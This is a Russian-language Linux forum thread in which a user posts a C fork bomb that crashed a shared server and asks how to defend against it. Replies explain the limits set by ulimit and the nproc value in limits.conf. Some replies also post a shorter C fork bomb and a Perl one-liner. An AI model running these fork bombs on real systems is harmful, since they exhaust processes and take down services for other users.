LINUX.ORG.RU

Простейший вирус для линукса

0

0

Не знаю куда писать вот и пишу сюда.

народ объясните мне плиз - есть типовая ситуация удаленный сервак на который я имею ssh доступ как рядовой пользователь и могу на нем работать как ОБЫЧНЫЙ ЮЗЕР т. е. имею право создать файл в текстовом редакторе, скомпилировать его, и запустить. Насколько я понимаю такое бывает часто и даже очень часто. (поправте меня если я не прав)

вот я и создаю такой вот примитивный файл:

#include <unistd.h>

int funct()
{
if ( fork() )
funct();
else funct();
}

int main(int argc, char *argv[])
{
funct();

return 0;
}

при удачном стечении обстоятельств можно и дерективу #include пропустить и компилер её все равно проглотит. Компилю я эту хрень и запускаю. Все после этого сервак работает еще минуту максимум после чего он занимается только тем что плодит процессы... Короче классический вариант ДОС атаки.

Теперь вопрос - неужели от этого нет защиты? Покрутил ядро на поверхности ответа не нашел...
грустно...
очень на винды похоже...

anonymous

это называется fork-бомба и противодействие этому - `man ulimit`

ale ★★
()

Венду форкбомбой дольше валить.

Sphinx ★★☆☆
()

На серверах "обычным юзерам" урезают количество одновременно запущенных процессов. Читай маны по лимитам, как тебе уже сказали.

Cy6erBr4in ★★★
()

vim /etc/security/limits.conf -> смотреть параметр nproc

Reset ★★★★★
()

Многобукф...

#include <unistd.h> 

main() 
{ 
 while(1)
  fork();
 return 0; 
}

Также в шедуллере кажется есть фича, согласно которой все время делится на юзверей, а внутри юзверспейса квантуется (такое бирди постил на главной)

generatorglukoff ★★
()
Ответ на: комментарий от Legioner

>почти хвостовая рекурсия :D

"gcc -O2" -- почему почти? :)

anonymous
()

> неужели от этого нет защиты?

А ты попробуй перед запуском твоего "супервируса" выполнить команду: ulimit -u 50 и запускай свои "вирусы" на здоровье ;)

P.S.: perl -e "fork while fork" &

grad
()

> при удачном стечении обстоятельств

ГСМ?

anonymous
()
Ответ на: комментарий от fura13

Ага, и кошмарский в венде им будет закрывать доступ к компу. "Извините, вы превысили свой лимит процессов, ваша учетная запись анулирована. Обратитесь к администратору.".

Sidrian
()

>скоро тупых юзверей будут называть вирусами

Это более страшная зараза

generatorglukoff ★★
()

Гениально!!! )))))))))

>if ( fork() ) >funct(); >else funct();

это первое, второе - это классический вариант неуча! при том это не совсем ДОС атака, хотя быть может в какой-то мере и классическая :))). Как уже сказали, это просто форк-бомба. При здравом админе она работать не будет.

Deleted
()

> скоро тупых юзверей будут называть вирусами

Деструктивный? Деструктивный. Размножается? Размножается. Значит вирус :)

watashiwa_daredeska ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.